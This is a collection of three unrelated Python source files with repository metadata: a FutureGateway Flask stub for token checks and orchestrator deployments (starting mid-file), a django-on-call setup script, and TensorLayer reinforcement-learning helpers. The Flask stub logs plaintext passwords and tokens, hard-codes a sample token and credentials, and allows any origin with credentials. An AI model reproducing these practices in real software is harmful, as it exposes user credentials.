fgapisrv_geappid = int(fg_config.get_config_value('fgapisrv_geappid'))
fgjson_indent = int(fg_config.get_config_value('fgjson_indent'))
fgapisrv_key = fg_config.get_config_value('fgapisrv_key')
fgapisrv_crt = fg_config.get_config_value('fgapisrv_crt')
fgapisrv_logcfg = fg_config.get_config_value('fgapisrv_logcfg')
fgapisrv_dbver = fg_config.get_config_value('fgapisrv_dbver')
fgapisrv_secret = fg_config.get_config_value('fgapisrv_secret')
fgapisrv_notoken = (fg_config.get_config_value(
    'fgapisrv_notoken').lower() == 'true')
fgapisrv_notokenusr = fg_config.get_config_value('fgapisrv_notokenusr')
fgapisrv_lnkptvflag = fg_config.get_config_value('fgapisrv_lnkptvflag')
fgapisrv_ptvendpoint = fg_config.get_config_value('fgapisrv_ptvendpoint')
fgapisrv_ptvuser = fg_config.get_config_value('fgapisrv_ptvuser')
fgapisrv_ptvpass = fg_config.get_config_value('fgapisrv_ptvpass')
fgapisrv_ptvdefusr = fg_config.get_config_value('fgapisrv_ptvdefusr')
fgapisrv_ptvmapfile = fg_config.get_config_value('fgapisrv_ptvmapfile')
# fgapiserver database settings
fgapisrv_db_host = fg_config.get_config_value('fgapisrv_db_host')
fgapisrv_db_port = int(fg_config.get_config_value('fgapisrv_db_port'))
fgapisrv_db_user = fg_config.get_config_value('fgapisrv_db_user')
fgapisrv_db_pass = fg_config.get_config_value('fgapisrv_db_pass')
fgapisrv_db_name = fg_config.get_config_value('fgapisrv_db_name')
# Logging: configured from file, then dump the effective configuration
logging.config.fileConfig(fgapisrv_logcfg)
logger = logging.getLogger(__name__)
logger.debug(fg_config.show_conf())
# setup Flask app
app = Flask(__name__)
##
# Authentication
##
def check_auth(username, password):
    """This function is called to check if a username /
    password combination is valid.

    Compares against the configured PTV credentials
    (fgapisrv_ptvuser / fgapisrv_ptvpass).
    """
    # NOTE(review): this logs the *plaintext* password to stdout
    # (and the message contains a typo in a runtime string).
    print "Ckecking for: %s - %s" % (username, password)
    return username == fgapisrv_ptvuser and fgapisrv_ptvpass == password
def authenticate():
    """Build the 401 response that triggers HTTP basic auth in the client."""
    body = ('Could not verify your access level for that URL.\n'
            'You have to login with proper credentials')
    challenge = {'WWW-Authenticate': 'Basic realm="Login Required"'}
    return Response(body, 401, challenge)
def requires_auth(f):
    """Decorator enforcing HTTP basic auth (via check_auth) on a view."""
    @wraps(f)
    def wrapper(*args, **kwargs):
        credentials = request.authorization
        # valid credentials -> run the wrapped view; anything else -> 401
        if credentials and check_auth(credentials.username,
                                      credentials.password):
            return f(*args, **kwargs)
        return authenticate()
    return wrapper
##
# PTV handlers
##
#
# /get-token; PTV endpoint to retrieve a new valid token
# Portals normally return a json in the format:
# {
# "error": null,
# "groups": null,
# "subject": "<the-subject>",
# "token": "<the-new-token>"
# }
# This PTV handler totally ignores basic authentication credentials
# (username/password) contained in the request form but needs the
# subject field initially returned by the checktoken/ call
#
@app.route('/get-token', methods=['GET', 'POST'])
@app.route('/%s/get-token' % fgapiver, methods=['GET', 'POST'])
@requires_auth
def get_token():
    """PTV stub endpoint returning a canned token.

    POST returns a fixed JWT-shaped token together with the echoed
    ``subject`` form value; any other method returns a 400 error payload.
    """
    response = {}
    subject = request.values.get('subject')
    if request.method == 'GET':
        # GET is declared on the route but not supported by this stub
        message = "Unhandled method: '%s'" % request.method
        response["error"] = message
        ctk_status = 400
    elif request.method == 'POST':
        # hard-coded sample token (test fixture, not a real credential)
        response = {
            "error": None,
            "groups": None,
            "subject": subject,
            "token": "eyJraWQiOiJyc2ExIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiIzYTJkN"
                     "BmNS0zYmRjLTQwMjAtODJjYi0xMDI4OTQzYzc3N2QiLCJpc3MiOiJodH"
                     "wczpcL1wvaWFtLXRlc3QuaW5kaWdvLWRhdGFjbG91ZC5ldVwvIiwiZXh"
                     "IjoxNDc2MjY3NjA2LCJpYXQiOjE0NzYyNjQwMDYsImp0aSI6IjRjN2Y5"
                     "TczLWJmYzItNDEzYy1hNzhjLWUxZmJlMGU2NjAwYSJ9.BfDlr6Far_oe"
                     "7z-SuLPbXgfKx3VuHJ0iuL-Dyd6G5_7_rNPrvZr5Da_HJUfonOLr8uOo"
                     "UhMUIP_Xiw4ZuWVIIhNPDSdu4lhWy5kkcoQ3rI9myNT2WxLA3IP2ZEwP"
                     "InefF0LzAlMj4-iQQw-kAavKgvA00sO8cww9Hzx6Thfw"
        }
        ctk_status = 200
    else:
        message = "Unhandled method: '%s'" % request.method
        response["error"] = message
        ctk_status = 400
    # include _links part
    response["_links"] = [{"rel": "self", "href": "/get-token"}, ]
    js = json.dumps(response, indent=fgjson_indent)
    resp = Response(js, status=ctk_status, mimetype='application/json')
    resp.headers['Content-type'] = 'application/json'
    return resp
#
# /checktoken; PTV normally uses a portal endpoint to verify incoming Tokens
# Portals normally return a json in the format:
# { "token_status": "<valid|invalid>",
# ["portal_user": "<portal_username>"
# "portal_group": "<portal user group name>" ] }
# Optional fields portal_user and portal_groups are used to map the portal
# user/group with a FutureGateway user/group
# This PTV handler totally ignores basic authentication credentials
# (username/password) contained in the request form
#
@app.route('/get-token-info', methods=['GET', 'POST'])
@app.route('/%s/get-token-info' % fgapiver, methods=['GET', 'POST'])
@app.route('/checktoken', methods=['GET', 'POST'])
@app.route('/%s/checktoken' % fgapiver, methods=['GET', 'POST'])
@requires_auth
def checktoken():
    """PTV token-verification stub.

    POST returns a canned 'valid token' payload (subject + groups);
    every other method gets a 400 with an error message.  Basic-auth
    credentials are checked by requires_auth; the token value itself
    is read but not validated.
    """
    response = {}
    token = request.values.get('token')  # read but deliberately unchecked
    if request.method == 'POST':
        # canned response; a real portal could also return portal_user /
        # portal_group for mapping onto FutureGateway users and groups
        response = {
            "error": None,
            "groups": [
                "Users",
                "Developers"
            ],
            "subject": "a9f37548-4024-4330-88bf-4f43067e6bdb"
        }
        ctk_status = 200
    else:
        # GET (or anything else) is not supported by this stub
        response["error"] = "Unhandled method: '%s'" % request.method
        ctk_status = 400
    # include _links part
    response["_links"] = [{"rel": "self", "href": "/checktoken"}, ]
    js = json.dumps(response, indent=fgjson_indent)
    resp = Response(js, status=ctk_status, mimetype='application/json')
    resp.headers['Content-type'] = 'application/json'
    return resp
##
# Orchestrator test handler
##
def create_inprogress():
    """Return a canned CREATE_IN_PROGRESS deployment payload (test stub).

    BUGFIX: the original ended with an unreachable ``return response``
    referencing an undefined name; it has been removed.
    """
    return {
        "uuid": "756ed6b2-ed63-4992-a8f8-8d5d8045ae02",
        "creationTime": "2016-08-01T12:47+0000",
        "status": "CREATE_IN_PROGRESS",
        "outputs": {},
        "task": "NONE",
        "links": [
            {
                "rel": "self",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02")
            },
            {
                "rel": "resources",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02/resources")
            },
            {
                "rel": "template",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02/template")
            }
        ]
    }
def create_failed():
    """Return a canned CREATE_FAILED deployment payload (test stub).

    The statusReason reproduces a real multi-attempt OpenNebula
    provisioning failure message.
    """
    return {
        "uuid": "756ed6b2-ed63-4992-a8f8-8d5d8045ae02",
        "creationTime": "2016-08-01T12:47+0000",
        "updateTime": "2016-08-01T12:47+0000",
        "status": "CREATE_FAILED",
        "statusReason": ("Error 400: Error Creating Inf.: "
                         "Some deploys did not proceed "
                         "successfully: All machines could not be "
                         "launched: \nAttempt 1: Error launching the VMs of "
                         "type ambertools_server to cloud ID one of type "
                         "OpenNebula. Cloud Provider "
                         "Error: No ONE network found for network: "
                         "public_net\n"
                         "Attempt 2: Error launching the VMs of type "
                         "ambertools_server to cloud ID one of type "
                         "OpenNebula. "
                         "Cloud Provider Error: No ONE network found for "
                         "network: public_net\nAttempt 3: Error "
                         "launching the "
                         "VMs of type ambertools_server to cloud ID one of "
                         " type OpenNebula. Cloud Provider Error: No ONE "
                         "network found for network: public_net\n\n"),
        "outputs": {},
        "task": "NONE",
        "cloudProviderName": "provider-UPV-GRyCAP",
        "links": [
            {
                "rel": "self",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02")
            },
            {
                "rel": "resources",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02/resources")
            },
            {
                "rel": "template",
                "href": ("http://90.147.170.152:8080/orchestrator/deployments/"
                         "756ed6b2-ed63-4992-a8f8-8d5d8045ae02/template")
            }
        ]
    }
def create_complete():
    """Return a canned CREATE_COMPLETE deployment payload (test stub).

    Includes sample outputs (node credentials and IP) as a successful
    deployment would report them.
    """
    return {
        "uuid": "1bff4c04-e8b7-43be-8846-a39df1664433",
        "creationTime": "2016-04-12T19:34+0000",
        "updateTime": "2016-04-12T19:38+0000",
        "status": "CREATE_COMPLETE",
        "outputs": {
            "node_creds": "{password=7Uxz4RJR, user=jobtest}",
            "node_ip": "localhost"
        },
        "task": "NONE",
        "links": [
            {
                "rel": "self",
                "href": ("http://90.147.170.152/orchestrator/deployments/"
                         "1bff4c04-e8b7-43be-8846-a39df1664433")
            },
            {
                "rel": "resources",
                "href": ("http://90.147.170.152/orchestrator/deployments/"
                         "1bff4c04-e8b7-43be-8846-a39df1664433/resources")
            },
            {
                "rel": "template",
                "href": ("http://90.147.170.152/orchestrator/deployments/"
                         "1bff4c04-e8b7-43be-8846-a39df1664433/template")
            }
        ]
    }
def check_input():
    """Return a canned deployment request body (test stub).

    Contains the input parameters plus an inline TOSCA template for an
    AmberTools v15 instance, as a client would POST it.
    """
    return {
        "parameters": {
            "number_cpus": 1,
            "memory_size": "1 GB"
        },
        # the template is a single embedded TOSCA YAML document
        "template": (
            "tosca_definitions_version: tosca_simple_yaml_1_0\n\n"
            "imports:\n - indigo_custom_types: "
            "https://raw.githubusercontent.com/indigo-dc/tosca-types"
            "/master/custom_types.yaml\n\ndescription: TOSCA template "
            "for deploying an instance of AmberTools v15\n"
            "\ntopology_template:\n"
            " inputs:\n number_cpus:\n type: integer\n "
            "description: number of cpus required for the instance\n "
            "default: 1\n memory_size:\n type: string\n description: "
            "ram memory required for the instance\n default: 1 GB\n\n "
            "node_templates:\n\n ambertools:\n type: tosca.nodes.indigo."
            "Ambertools\n requirements:\n - host: ambertools_server\n\n "
            "ambertools_server:\n type: tosca.nodes.indigo.Compute\n "
            "capabilities:\n endpoint:\n properties:\n network_name: "
            "PUBLIC\n ports:\n ssh_port:\n protocol: tcp\n source: 22\n "
            "host:\n properties:\n num_cpus: { get_input: number_cpus }\n "
            "mem_size: { get_input: memory_size }\n os:\n properties:\n "
            "type: linux\n distribution: ubuntu\n version: 14.04\n "
            "image: indigodatacloudapps/ambertools\n\n outputs:\n "
            "instance_ip:\n value: { get_attribute: [ ambertools_server, "
            "public_address, 0 ] }\n instance_creds:\n value: { "
            "get_attribute: [ ambertools_server, endpoint, credential,"
            " 0 ] }")
    }
@app.route('/orchestrator/deployments/<uuid>', methods=['GET', 'DELETE'])
def orchestrator_deployments_get(uuid):
    """Orchestrator test handler for a single deployment.

    GET returns a canned CREATE_COMPLETE payload (swap the commented
    alternatives to simulate in-progress/failed states); DELETE is not
    implemented and returns 404.
    """
    response = {}
    dep_status = 404
    token = request.headers.get('Authorization')
    if request.method == 'GET':
        print "endpoint: /orchestrator/deployments/%s (GET)" % uuid
        print "token: %s" % token
        dep_status = 200
        # pick one of the canned payloads to simulate deployment states:
        # response = create_inprogress()
        response = create_complete()
        # response = create_failed()
    elif request.method == 'DELETE':
        print "endpoint: /orchestrator/deployments/%s (DELETE)" % uuid
        dep_status = 404
        response = {"error": "Method not yet implemented"}
    print "response: '%s'" % response
    js = json.dumps(response, indent=fgjson_indent)
    resp = Response(js, status=dep_status, mimetype='application/json')
    resp.headers['Content-type'] = 'application/json'
    return resp
@app.route('/orchestrator/deployments', methods=['POST'])
def orchestrator_deployments():
    """Orchestrator test handler: POST creates a fake deployment.

    Returns 201 with a canned CREATE_IN_PROGRESS payload.
    """
    response = {}
    dep_status = 404
    token = request.headers.get('Authorization')
    if request.method == 'GET':
        # NOTE(review): unreachable -- the route only accepts POST.
        dep_status = 404
        response = {"error": "Method not supported"}
    elif request.method == 'POST':
        print "endpoint: /orchestrator/deployments (POST)"
        print "token: %s" % token
        dep_status = 201
        response = create_inprogress()
    js = json.dumps(response, indent=fgjson_indent)
    resp = Response(js, status=dep_status, mimetype='application/json')
    resp.headers['Content-type'] = 'application/json'
    return resp
# Common header section
@app.after_request
def after_request(response):
    """Attach CORS and server-identification headers to every response."""
    extra_headers = (
        ('Access-Control-Allow-Origin', '*'),
        ('Access-Control-Allow-Headers', 'Content-Type,Authorization'),
        ('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,PATCH'),
        ('Access-Control-Allow-Credentials', 'true'),
        ('Server', fgapiserver_name),
    )
    for (header_name, header_value) in extra_headers:
        response.headers.add(header_name, header_value)
    return response
#
# The app starts here
#
# Now execute accordingly to the app configuration (stand-alone/wsgi)
if __name__ == "__main__":
    # Stand-alone mode: serve over HTTPS when both a certificate and key
    # are configured, otherwise fall back to plain HTTP.
    if len(fgapisrv_crt) > 0 and len(fgapisrv_key) > 0:
        context = SSL.Context(SSL.SSLv23_METHOD)
        context.use_privatekey_file(fgapisrv_key)
        context.use_certificate_file(fgapisrv_crt)
        app.run(host=fgapisrv_host, port=fgapisrv_port,
                ssl_context=context, debug=fgapisrv_debug)
    else:
        # NOTE(review): the HTTP fallback listens on port+1, not on the
        # configured port -- confirm this offset is intentional.
        app.run(host=fgapisrv_host, port=fgapisrv_port+1, debug=fgapisrv_debug)
| {
"content_hash": "a1079d3a1f8d3bf689f29b955c12e628",
"timestamp": "",
"source": "github",
"line_count": 427,
"max_line_length": 79,
"avg_line_length": 37.89695550351288,
"alnum_prop": 0.5997404523544679,
"repo_name": "FutureGateway/geAPIServer",
"id": "282d436fbafe07dccd488446e06b7ceecc34e374",
"size": "16968",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fgapiserver_ptv.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "PLpgSQL",
"bytes": "4024"
},
{
"name": "Python",
"bytes": "73089"
},
{
"name": "Shell",
"bytes": "4469"
}
],
"symlink_target": ""
} |
"Point website users at configurable on-call administrators"
import codecs as _codecs
from distutils.core import setup
import os.path as _os_path
from django_on_call import __version__
_this_dir = _os_path.dirname(__file__)
# NOTE(review): distutils is deprecated and removed in Python 3.12;
# consider migrating to setuptools' setup().
# Package metadata: the long description is read from the adjacent README,
# the short description is this module's docstring.
setup(
    name='django-on-call',
    version=__version__,
    maintainer='W. Trevor King',
    maintainer_email='wking@tremily.us',
    url='https://github.com/wking/django-on-call',
    download_url='https://github.com/wking/django-on-call/archive/v{}.tar.gz'.format(__version__),
    license='BSD License',
    platforms=['all'],
    description=__doc__,
    long_description=_codecs.open(
        _os_path.join(_this_dir, 'README'), 'r', encoding='utf-8').read(),
    classifiers=[
        'Development Status :: 2 - Pre-Alpha',
        'Framework :: Django',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
    packages=['django_on_call'],
    provides=['django_on_call'],
    # ship the app's HTML templates with the package
    package_data={'django_on_call': ['templates/django_on_call/*.html']},
)
| {
"content_hash": "c281584a0fe13490ea5243f91c93e013",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 98,
"avg_line_length": 35.21951219512195,
"alnum_prop": 0.618421052631579,
"repo_name": "wking/django-on-call",
"id": "55345f39509250e21e284e399eaf2d554da34999",
"size": "1444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "11518"
}
],
"symlink_target": ""
} |
import tensorflow as tf
import numpy as np
from six.moves import xrange
def discount_episode_rewards(rewards=None, gamma=0.99, mode=0):
    """ Take 1D float array of rewards and compute discounted rewards for an
    episode. When encount a non-zero value, consider as the end a of an episode.

    Parameters
    ----------
    rewards : list or 1D numpy array
        A list of rewards.  Input is coerced with ``np.asarray``, so plain
        Python lists work too (the previous default of ``[]`` crashed on
        ``rewards.size``).
    gamma : float
        discounted factor
    mode : int
        if mode == 0, reset the discount process when encount a non-zero reward (Ping-pong game).
        if mode == 1, would not reset the discount process.

    Examples
    ----------
    >>> rewards = np.asarray([0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1])
    >>> gamma = 0.9
    >>> discount_rewards = tl.rein.discount_episode_rewards(rewards, gamma)
    >>> print(discount_rewards)
    ... [ 0.72899997  0.81        0.89999998  1.          0.72899997  0.81
    ...   0.89999998  1.          0.72899997  0.81        0.89999998  1.        ]
    >>> discount_rewards = tl.rein.discount_episode_rewards(rewards, gamma, mode=1)
    >>> print(discount_rewards)
    ... [ 1.52110755  1.69011939  1.87791049  2.08656716  1.20729685  1.34144104
    ...   1.49048996  1.65610003  0.72899997  0.81        0.89999998  1.        ]
    """
    # Coerce to an array so .size and element indexing always work.
    rewards = np.asarray([] if rewards is None else rewards)
    discounted_r = np.zeros_like(rewards, dtype=np.float32)
    running_add = 0
    # Walk backwards so each step accumulates the discounted future return.
    # `range` replaces six.moves.xrange -- identical behaviour, no six needed.
    for t in reversed(range(0, rewards.size)):
        if mode == 0:
            # a non-zero reward marks an episode boundary: reset the return
            if rewards[t] != 0:
                running_add = 0
        running_add = running_add * gamma + rewards[t]
        discounted_r[t] = running_add
    return discounted_r
def cross_entropy_reward_loss(logits, actions, rewards, name=None):
    """ Calculate the loss for Policy Gradient Network.

    Computes sparse softmax cross-entropy per step, weights each step by its
    (discounted) reward, and sums the result.

    Parameters
    ----------
    logits : tensor
        The network outputs without softmax. This function implements softmax
        inside.
    actions : tensor/ placeholder
        The agent actions.
    rewards : tensor/ placeholder
        The rewards.

    Examples
    ----------
    >>> states_batch_pl = tf.placeholder(tf.float32, shape=[None, D])
    >>> network = InputLayer(states_batch_pl, name='input')
    >>> network = DenseLayer(network, n_units=H, act=tf.nn.relu, name='relu1')
    >>> network = DenseLayer(network, n_units=3, name='out')
    >>> probs = network.outputs
    >>> sampling_prob = tf.nn.softmax(probs)
    >>> actions_batch_pl = tf.placeholder(tf.int32, shape=[None])
    >>> discount_rewards_batch_pl = tf.placeholder(tf.float32, shape=[None])
    >>> loss = tl.rein.cross_entropy_reward_loss(probs, actions_batch_pl, discount_rewards_batch_pl)
    >>> train_op = tf.train.RMSPropOptimizer(learning_rate, decay_rate).minimize(loss)
    """
    # API compatibility shims: keyword names changed between TF 0.12 and 1.0,
    # so try the new signature first and fall back to the old one.
    try: # TF 1.0+
        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=actions, logits=logits, name=name)
    except:
        cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, targets=actions)
    # cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, actions)
    # tf.multiply (TF 1.0+) replaced tf.mul (TF 0.12); same element-wise op.
    try: ## TF1.0+
        loss = tf.reduce_sum(tf.multiply(cross_entropy, rewards))
    except: ## TF0.12
        loss = tf.reduce_sum(tf.mul(cross_entropy, rewards))  # element-wise mul
    return loss
def log_weight(probs, weights, name='log_weight'):
    """Log weight.

    Builds ``mean(log(probs) * weights)`` inside a variable scope.

    Parameters
    -----------
    probs : tensor
        If it is a network output, usually we should scale it to [0, 1] via softmax.
    weights : tensor
    name : str
        Variable-scope name for the created ops.
    """
    with tf.variable_scope(name):
        return tf.reduce_mean(tf.log(probs) * weights)
def choice_action_by_probs(probs=(0.5, 0.5), action_list=None):
    """Choice and return an an action by given the action probability distribution.

    Parameters
    ------------
    probs : a list of float.
        The probability distribution of all actions.  (Default changed from
        a mutable list literal to an equivalent tuple.)
    action_list : None or a list of action in integer, string or others.
        If None, returns an integer range between 0 and len(probs)-1.

    Raises
    ------
    ValueError
        If ``action_list`` is given and its length differs from ``probs``.
        (Previously an ``assert``, which is silently stripped under ``-O``.)

    Examples
    ----------
    >>> for _ in range(5):
    >>>     a = choice_action_by_probs([0.2, 0.4, 0.4])
    >>>     print(a)
    ... 0
    ... 1
    ... 1
    ... 2
    ... 1
    >>> for _ in range(3):
    >>>     a = choice_action_by_probs([0.5, 0.5], ['a', 'b'])
    >>>     print(a)
    ... a
    ... b
    ... b
    """
    if action_list is None:
        # default action space: integer indices into probs
        action_list = np.arange(len(probs))
    elif len(action_list) != len(probs):
        raise ValueError(
            "Number of actions should equal to number of probabilities.")
    return np.random.choice(action_list, p=probs)
| {
"content_hash": "02387669b26be272416c8771d21d7145",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 112,
"avg_line_length": 35.457364341085274,
"alnum_prop": 0.6058154787931789,
"repo_name": "luoxier/CycleGAN_Tensorlayer",
"id": "f6d5449b87471ffcdfcd46c7138bd1f404bb8616",
"size": "4619",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorlayer/rein.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "545698"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.